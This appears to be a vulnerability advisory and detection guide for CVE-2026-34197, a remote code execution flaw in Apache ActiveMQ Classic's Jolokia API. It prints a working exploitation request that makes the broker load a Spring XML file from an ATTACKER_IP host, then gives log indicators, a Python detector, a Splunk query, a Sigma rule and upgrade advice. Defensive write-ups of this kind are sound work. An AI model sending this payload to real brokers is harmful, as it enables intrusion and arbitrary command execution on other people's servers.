CVE-2026-34197 identifies a remote code execution (RCE) flaw in Apache ActiveMQ Classic. By invoking management operations via the Jolokia API, an attacker forces the broker to fetch and execute a remote Spring XML configuration file, leading to arbitrary OS command execution. This vulnerability has existed in the codebase for approximately 13 years.
Apache ActiveMQ Classic is a Java message broker widely deployed in enterprise environments. CVE-2026-34197 exposes a critical RCE path by abusing the addNetworkConnector(String) operation on the broker MBean. The vulnerability allows an authenticated attacker—or an unauthenticated one on specific misconfigured versions—to force the broker to load an attacker-controlled remote Spring XML configuration, triggering arbitrary command execution via Spring’s MethodInvokingFactoryBean.
The ActiveMQ Classic broker exposes a web console on port 8161, which includes Jolokia, an HTTP-to-JMX bridge. Historically, security fixes attempted to restrict Jolokia to read-only operations for dangerous MBeans but provided a blanket allowance for ActiveMQ’s own MBeans.
The vulnerability stems from this operation=* allowance on the ActiveMQ Broker MBean. An attacker calls addNetworkConnector with a crafted URI. ActiveMQ’s VM transport (vm://) then uses this URI to instantiate a broker, accepting a brokerConfig parameter that supports external Spring XML files via xbean:http://.
Exploitation involves a POST request to the Jolokia API endpoint.
Prepare a malicious Spring XML file on a remote server accessible to the target broker.
Send a POST request to http://TARGET:8161/api/jolokia/ with the following JSON payload:
{
  "type": "exec",
  "mbean": "org.apache.activemq:type=Broker,brokerName=localhost",
  "operation": "addNetworkConnector",
  "arguments": ["static:(vm://rce?brokerConfig=xbean:http://ATTACKER_IP:8888/payload.xml)"]
}

The broker attempts to establish a network connection using the provided vm:// URI.
The BrokerFactory.createBroker() method processes the brokerConfig, loading and executing the malicious Spring XML, which triggers the command defined in MethodInvokingFactoryBean.
Analysis of broker logs and process behavior is required.
Log Indicators
Search activemq.log for:
Establishing network connection from vm://localhost to vm://rce?create=true&brokerConfig=xbean:http://
Network Indicators
Identify unexpected outbound HTTP requests from the ActiveMQ Java process to external IP addresses.
API Indicators
Analyze web server logs for POST requests to /api/jolokia/ containing addNetworkConnector in the request body.
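The log and API indicators above can be checked programmatically. The following Python is an added example, not code from the original writeup or from the ActiveMQ project; it parses the vm:// URI from the broker's "Establishing network connection" log line and the Jolokia request body, and flags any brokerConfig that points at a remote xbean:http(s):// resource, regardless of the broker name the caller chose (the literal "rce" in the page's indicator is attacker-controlled). The sample log lines and request body are constructed test data; 203.0.113.10 is a documentation address.

```python
import json
import re
from urllib.parse import parse_qs, urlsplit

# Broker log line written when a network connector is established (the page's indicator).
BROKER_LOG_RE = re.compile(r"Establishing network connection from \S+ to (?P<uri>\S+)")

def uri_loads_remote_xbean(uri: str) -> bool:
    """True if a (possibly static:(...)-wrapped) vm:// URI pulls brokerConfig from xbean:http(s)://."""
    m = re.search(r"vm://[^\s)]+", uri)
    if not m:
        return False
    params = parse_qs(urlsplit(m.group(0)).query)
    return any(re.match(r"xbean:https?://", cfg, re.I) for cfg in params.get("brokerConfig", []))

def jolokia_request_is_suspicious(body: str) -> bool:
    """Flag a Jolokia exec request (single or bulk) calling addNetworkConnector with a vm:// transport."""
    try:
        req = json.loads(body)
    except ValueError:
        return False
    for r in req if isinstance(req, list) else [req]:
        if not isinstance(r, dict) or r.get("type") != "exec":
            continue
        # Jolokia accepts "op" or "op(signature)"; compare the bare operation name.
        if str(r.get("operation", "")).split("(")[0] != "addNetworkConnector":
            continue
        if any(isinstance(a, str) and "vm://" in a.lower() for a in r.get("arguments", [])):
            return True
    return False

def scan_broker_log(lines):
    """Return (line_number, uri) for each activemq.log line that matches the indicator."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = BROKER_LOG_RE.search(line)
        if m and uri_loads_remote_xbean(m.group("uri")):
            hits.append((n, m.group("uri")))
    return hits

# Constructed sample data: a benign connector, then one fetching a remote xbean config
# under a non-default broker name ("hunt"); 203.0.113.10 is a documentation address.
SAMPLE_BROKER_LOG = [
    "INFO | Establishing network connection from vm://localhost to tcp://broker2:61616",
    "INFO | Establishing network connection from vm://localhost to "
    "vm://hunt?create=true&brokerConfig=xbean:http://203.0.113.10:8888/cfg.xml",
]
SAMPLE_JOLOKIA_BODY = ('{"type":"exec","mbean":"org.apache.activemq:type=Broker,brokerName=localhost",'
    '"operation":"addNetworkConnector(java.lang.String)",'
    '"arguments":["static:(vm://hunt?brokerConfig=xbean:http://203.0.113.10:8888/cfg.xml)"]}')
```

Run scan_broker_log over the broker log and jolokia_request_is_suspicious over the bodies of POST requests to /api/jolokia/; a local xbean:file: brokerConfig is not flagged, since the indicator is the remote fetch.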
Threat hunting requires identifying the specific pattern used in the exploitation attempt.
index=activemq_logs "vm://rce?create=true&brokerConfig=xbean:http://"

Sigma Rule
title: Potential Apache ActiveMQ RCE via Jolokia
description: Detects exploitation of CVE-2026-34197 via Jolokia addNetworkConnector
logsource:
    product: activemq
detection:
    selection:
        message|contains: 'vm://rce?create=true&brokerConfig=xbean:http://'
    condition: selection
level: critical

Remediation
Update to Apache ActiveMQ Classic versions 5.19.4 or 6.2.3. These versions remove the ability for addNetworkConnector to add vm:// transports. Additionally, ensure the web console is secured and default credentials are changed.